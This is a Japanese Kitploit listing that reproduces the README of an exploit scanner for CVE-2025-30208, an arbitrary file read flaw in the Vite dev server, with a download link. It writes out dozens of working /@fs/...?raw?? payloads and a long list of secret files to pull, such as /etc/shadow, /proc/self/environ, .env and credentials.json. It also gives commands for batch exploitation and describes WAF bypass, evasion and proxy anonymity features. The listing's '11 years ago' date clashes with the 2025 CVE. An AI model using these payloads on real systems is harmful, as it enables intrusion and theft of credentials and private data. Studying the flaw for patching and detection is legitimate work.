Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の深刻度の任意ファイル読み取り脆弱性です。 | Kitploit
ツール/GitHubGitHub/th-secforge/cve-2025-30208
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の深刻度の任意ファイル読み取り脆弱性です。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2025-30208 Vite任意ファイル読み取り脆弱性スキャナー

Python License Security Status Modular

CVE-2025-30208向け高度な脆弱性スキャナー(エンタープライズグレードの機能搭載)

Vite任意ファイル読み取り脆弱性検出のためのプロフェッショナルペネトレーションテストツール

🚀 クイックスタート • 📋 機能 • 🔧 使用方法 • 📊 例 • 🛡️ セキュリティ


📖 概要

これは、Vite開発サーバーの CVE-2025-30208 脆弱性を検出・悪用するために設計された総合的な脆弱性スキャナーです。この脆弱性により、Viteのファイルシステムエンドポイントを介して任意のファイルが読み取り可能となり、機密性の高い設定ファイル、ソースコード、システム情報が露出する可能性があります。

🎯 このツールの機能

  • 検出:ネットワーク上の脆弱なViteインスタンスを検出
  • 悪用:任意のファイル読み取り脆弱性を安全に悪用
  • 発見:機密ファイルや設定データを発見
  • 報告:複数の形式(HTML、JSON、コンソール)で結果を出力
  • 管理:スキャンセッションと設定を管理
  • 処理:自動リトライ機構によるエラーのグレースフルハンドリング

🏗️ モジュラーアーキテクチャ

このツールは、保守性と拡張性を高めるために モジュラーアーキテクチャ を採用しています。

  • CVE-2025-30208.py - メインスキャナーアプリケーション
  • payloads.py - 高度な悪用ペイロード(60種類以上)
  • sensitive_files.py - 包括的な機密ファイルデータベース(200ファイル以上)
  • html_template.py - 強化されたハッカースタイルHTMLレポートテンプレート

🚀 クイックスタート

前提条件

root@kitploit:~
pip3 install -r requirements.txt

基本的な使い方

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 機能

🔍 コア脆弱性検出

  • 60以上の高度なペイロード:最大限の検出のための包括的な悪用手法
  • スマート検出:誤検出を避けるためのインテリジェントな応答分析
  • リアルタイム検証:ターゲット応答の継続的な検証
  • 包括的テスト:既知の脆弱なエンドポイントをすべてテスト

🛡️ 強化されたセキュリティ機能

  • プロキシサポート:匿名性のためのHTTP/HTTPSプロキシ設定
  • カスタムヘッダー:カスタムHTTPヘッダーによるWAF/IPSのバイパス
  • レート制限:検出を避けるための設定可能な遅延
  • セッション管理:スキャンセッションの保存と復元
  • 入力検証:包括的なパラメータ検証

🔧 高度な機能

  • バッチスキャン:複数ターゲットのマルチスレッドスキャン
  • 機密ファイル発見:200以上の機密ファイルの自動発見
  • 接続テスト:TCP/UDP/HTTP/HTTPSプロトコルテスト
  • エラー回復:指数バックオフによる自動リトライ
  • 包括的ログ:タイムスタンプ付きの詳細ログ

📊 レポートと出力

  • 🎨 強化されたHTMLレポート:アニメーション付きの美しいハッカースタイル脆弱性レポート
  • JSONエクスポート:さらなる分析のための構造化データ
  • コンソール出力:カラーコード化されたリアルタイムフィードバック
  • ログファイル:詳細な監査証跡
  • 対話型Webインターフェース:レポート表示のための組み込みWebサーバー

🔧 使用方法

1. 基本設定

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 脆弱性テスト

root@kitploit:~
CVE-2025-30208 > run

# 詳細出力のために冗長モードを有効化
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. バッチスキャン

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. 機密ファイル発見

root@kitploit:~
CVE-2025-30208 > scan

5. 高度な設定

root@kitploit:~
# プロキシ設定
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# カスタムヘッダー設定
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# レート制限設定
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 強化されたHTMLレポート

root@kitploit:~
# 美しいHTMLレポートを生成
CVE-2025-30208 > pull

# レポート表示用のWebサーバー起動
CVE-2025-30208 > web

# 特定のポートでWebサーバー起動
CVE-2025-30208 > web 8081

# Webサーバー停止
CVE-2025-30208 > web off

📊 コマンドリファレンス


⚙️ 設定オプション


🎨 強化されたペイロードシステム

このスキャナーは現在、payloads.py に 60種類以上のペイロードバリエーション を使用しています。

プライマリ @fs ペイロード

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

拡張パラメータバリエーション

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite固有バリエーション

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

モジュールシステムバリエーション

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

代替エンドポイント

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 強化された機密ファイル発見

このツールは現在、sensitive_files.py で 200以上の機密ファイル をテストします。

🖥️ システムファイル (Linux/Unix)

  • /etc/passwd - ユーザーアカウント情報
  • /etc/shadow - 暗号化されたパスワードデータ
  • /etc/services - ネットワークサービス
  • /etc/hosts - ホスト名マッピング
  • /etc/fstab - ファイルシステムテーブル
  • /etc/ssh/sshd_config - SSHサーバー設定
  • /etc/crontab - システムcronジョブ
  • /etc/sudoers - sudo設定

📊 プロセス情報

  • /proc/version - カーネルバージョン
  • /proc/cpuinfo - CPU情報
  • /proc/meminfo - メモリ情報
  • /proc/self/environ - プロセス環境変数
  • /proc/self/cmdline - プロセスコマンドライン
  • /proc/net/tcp - TCP接続
  • /proc/net/udp - UDP接続

⚙️ アプリケーション設定

  • .env - 環境変数
  • .env.local - ローカル環境
  • .env.production - 本番環境
  • config.json - アプリケーション設定
  • settings.json - アプリケーション設定
  • application.properties - Spring設定
  • application.yml - YAML設定
  • database.yml - データベース設定
  • secrets.json - シークレット管理

📦 Node.js / JavaScript ファイル

  • package.json - Node.js依存関係
  • package-lock.json - ロックされた依存関係
  • yarn.lock - Yarnロックファイル
  • vite.config.js - Vite設定
  • vite.config.ts - TypeScript Vite設定
  • tsconfig.json - TypeScript設定
  • webpack.config.js - Webpack設定
  • next.config.js - Next.js設定
  • nuxt.config.js - Nuxt.js設定
  • angular.json - Angular設定
  • vue.config.js - Vue.js設定
  • rollup.config.js - Rollup設定
  • eslint.config.js - ESLint設定

🔧 Git ファイル

  • .git/config - Git設定
  • .gitignore - Git無視ルール
  • .gitattributes - Git属性
  • .gitmodules - Gitサブモジュール
  • .git/HEAD - 現在のブランチ
  • .git/logs/HEAD - Gitログ
  • .git/refs/heads/master - masterブランチ
  • .git/refs/heads/main - mainブランチ

📚 ドキュメントファイル

  • README.md - プロジェクトドキュメント
  • CHANGELOG.md - 変更履歴
  • LICENSE - ライセンス情報
  • CONTRIBUTING.md - コントリビューションガイドライン
  • AUTHORS - 作成者情報
  • TODO.md - TODOリスト
  • ROADMAP.md - 開発ロードマップ

🐳 Docker ファイル

  • Dockerfile - Docker設定
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - オーバーライド設定
  • .dockerignore - Docker無視ルール
  • docker-compose.prod.yml - 本番設定
  • docker-compose.dev.yml - 開発設定

🌐 Webサーバー設定

  • nginx.conf - Nginx設定
  • apache2.conf - Apache設定
  • httpd.conf - HTTPデーモン設定
  • .htaccess - Apacheアクセス制御
  • web.config - IIS設定
  • robots.txt - 検索エンジン指示
  • sitemap.xml - サイト構造
  • manifest.json - Webアプリマニフェスト
  • sw.js - サービスワーカー
  • firebase.json - Firebase設定
  • firebase.rules - Firebaseセキュリティルール

🪟 Windows ファイル

  • boot.ini - ブート設定
  • autoexec.bat - 自動実行スクリプト
  • system.ini - システム設定
  • win.ini - Windows設定
  • Users - ユーザーディレクトリ
  • Windows - システムファイル
  • Program Files - アプリケーションディレクトリ

🍎 macOS ファイル

  • System - システムファイル
  • Library - ライブラリファイル
  • Applications - アプリケーションファイル
  • private/etc/hosts - hostsファイル
  • private/etc/passwd - ユーザーアカウント

🗄️ データベースファイル

  • database.db - SQLiteデータベース
  • database.sqlite - SQLiteデータベース
  • data.db - データデータベース
  • dump.sql - データベースダンプ
  • schema.sql - データベーススキーマ
  • migrations - データベースマイグレーション

📝 ログファイル

  • logs - ログディレクトリ
  • error.log - エラーログ
  • access.log - アクセスログ
  • app.log - アプリケーションログ
  • debug.log - デバッグログ
  • combined.log - 結合ログ

💾 バックアップファイル

  • backup - バックアップディレクトリ
  • backup.sql - データベースバックアップ
  • backup.zip - 圧縮バックアップ
  • dump - データダンプ
  • export - データエクスポート

🔒 セキュリティと認証

  • auth.json - 認証設定
  • credentials.json - 資格情報保存
  • keys.json - キー管理
  • tokens.json - トークン保存
  • jwt.json - JWT設定
  • oauth.json - OAuth設定

🔌 API & サービスファイル

  • api.json - API設定
  • swagger.json - APIドキュメント
  • openapi.json - OpenAPI仕様
  • graphql.json - GraphQL設定
  • schema.json - APIスキーマ

☁️ クラウドとデプロイ

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Serverless設定
  • terraform.tf - Terraform設定
  • kubernetes.yml - Kubernetes設定
  • k8s.yml - Kubernetes設定

📊 監視と分析

  • analytics.json - 分析設定
  • monitoring.json - 監視設定
  • metrics.json - メトリクス設定
  • telemetry.json - テレメトリデータ

🎨 強化されたHTMLレポート

このツールは現在、美しいハッカースタイルのHTMLレポート を生成します。

✨ ビジュアル機能

  • マトリックス風背景:アニメーションする落下文字
  • グラデーションアニメーションと発光効果
  • インタラクティブ要素:ホバー効果付き
  • レスポンシブデザイン:すべてのデバイス対応
  • ダークテーマ:セキュリティプロフェッショナル向けに最適化

📊 インタラクティブ統計

  • リアルタイムカウンター:漏洩総数と露出バイト数
  • 重要度インジケーター:カラーコード付き
  • 各漏洩のコピー機能
  • コンテンツプレビュー:サイズと行数表示
  • 展開可能セクション:詳細分析用

🔧 技術的特徴

  • Google Fonts統合(JetBrains Mono、Orbitron)
  • CSSアニメーションとトランジション
  • JavaScriptインタラクティビティ:ユーザー体験向上
  • モバイル対応デザイン
  • クロスブラウザ互換性

🌐 Webサーバー統合

  • レポート表示用の組み込みHTTPサーバー
  • 自動ブラウザオープン
  • ポート設定オプション
  • 簡単な起動/停止コマンド

🛡️ エラーハンドリングと復旧

自動リトライ機構

  • 3回のリトライ:失敗したリクエストは自動的に再試行
  • 指数バックオフ:リトライ間の遅延を増加
  • スマートエラー分類:エラータイプに応じた異なる処理
  • グレースフルリカバリ:エラー後もツールは動作継続

エラーカテゴリー

  • NetworkError:接続、タイムアウト、プロキシ問題
  • ConfigurationError:無効な設定とパラメータ
  • ValidationError:無効な入力パラメータ
  • ScannerError:一般的なスキャナーエラー

検証機能

  • リアルタイム入力検証:すべてのパラメータを使用前に検証
  • 設定検証:スキャン前に完全な検証を実行
  • 接続テスト:TCP/UDP/HTTP/HTTPSプロトコルテスト
  • プロキシ検証:プロキシURL形式の検証

📁 出力ファイル


📝 影響を受けるバージョン

🚨 脆弱なバージョン

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ 影響を受けないバージョン

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ セキュリティと倫理的な使用

⚠️ 重要なセキュリティ注意事項

  • 許可されたテストのみ:所有しているシステム、またはテストの明示的な許可があるシステムでのみ使用
  • 責任ある開示:システム所有者に脆弱性を報告
  • レート制限:ターゲットに過負荷をかけないよう適切な遅延を使用
  • プロキシ使用:必要に応じて匿名性のためにプロキシを使用することを検討
  • 法的コンプライアンス:現地の法律と規制への準拠を確認

🔒 ベストプラクティス

  • テスト前に必ず書面による許可を取得
  • 管理された環境でのみ使用
  • すべてのテスト活動を文書化
  • レート制限とシステムリソースを尊重
  • 発見事項を責任を持って報告

🚀 高度な使用例

例1:包括的なネットワークスキャン

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

例2:プロキシを使用したステルススキャン

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

例3:拡張レポートワークフロー

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

例4:機密ファイル発見

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ プロジェクト構造

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # メインスキャナーアプリケーション
├── payloads.py                # 高度な悪用ペイロード(60以上)
├── sensitive_files.py         # 機密ファイルデータベース(200以上)
├── html_template.py           # 強化されたHTMLレポートテンプレート
├── README.md                  # このドキュメント
├── requirements.txt           # Python依存関係
├── logs/                      # ログファイルディレクトリ
├── data_leak.html            # 生成されたHTMLレポート
├── data_leak.json            # 生成されたJSONレポート
└── session.json              # 保存されたセッション設定

🤝 コントリビュート

このツールの改善のためのコントリビュートを歓迎します。

  1. リポジトリを フォーク
  2. 機能ブランチを 作成
  3. 変更を 加える
  4. 十分に テスト
  5. プルリクエストを 送信

コントリビュート分野

  • payloads.py への新しいペイロードバリエーション
  • sensitive_files.py への追加の機密ファイルパターン
  • html_template.py への強化されたHTMLテンプレート
  • エラーハンドリングの改善
  • パフォーマンス最適化
  • ドキュメントの改善

📄 ライセンス

このプロジェクトは、教育目的および許可されたセキュリティテスト目的のみ にライセンスされています。

⚠️ 法的免責事項:このツールは、許可されたセキュリティテストおよび研究目的のみを対象としています。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。作者は、このツールの誤用について一切の責任を負いません。


👨‍💻 作者

ThemeHackers

GitHub

セキュリティ研究者 & ペネトレーションテスター


⭐ このツールが役に立ったなら、スターをお願いします! ⭐

セキュリティコミュニティのために ❤️ を込めて作られました

ツールをダウンロード
コマンド説明例
set <option> <value>設定オプションの設定set RHOST 192.168.1.100
show options現在の設定の表示show options
edit対話型オプションエディターedit
run / exploit脆弱性テストの実行run
batch複数ターゲットのバッチスキャンbatch
scan機密ファイルの発見scan
pull結果をHTML/JSONにエクスポートpull
web [on|off|port]HTMLレポート用Webサーバーweb 8080
saveセッション設定の保存save
loadセッション設定の読み込みload
testターゲットへの接続テストtest
validate現在の設定の検証validate
verbose冗長モードの切り替えverbose
proxyプロキシ設定の構成proxy
rateレート制限の設定rate
logログ情報の表示log
help / ?ヘルプの表示help
exit / quitツールの終了exit
オプション説明デフォルト検証
RHOSTターゲットホスト/IPアドレス-ホスト名/IP検証
RPORTターゲットポート番号-ポート範囲 (1-65535)
FILEPATHテストするファイルパスetc/passwdパス検証
PROXYHTTP/HTTPSプロキシURL-URL形式検証
VERBOSE冗長出力の有効化false真偽値検証
RATE_LIMITリクエスト間の遅延(秒)0.3数値検証
THREADSバッチスキャンのスレッド数5整数検証
TIMEOUTリクエストタイムアウト(秒)5整数検証
CUSTOM_HEADERSカスタムHTTPヘッダー (JSON){}JSON形式検証
  • prettier.config.js - Prettier設定
  • jest.config.js - Jest設定
  • babel.config.js - Babel設定
  • tailwind.config.js - Tailwind CSS設定
  • ファイル説明形式
    data_leak.html強化されたハッカースタイルHTML脆弱性レポートHTML
    data_leak.json構造化JSONエクスポートJSON
    sensitive_files_discovery.json発見された機密ファイルJSON
    session.json保存されたセッション設定JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log詳細な監査ログテキスト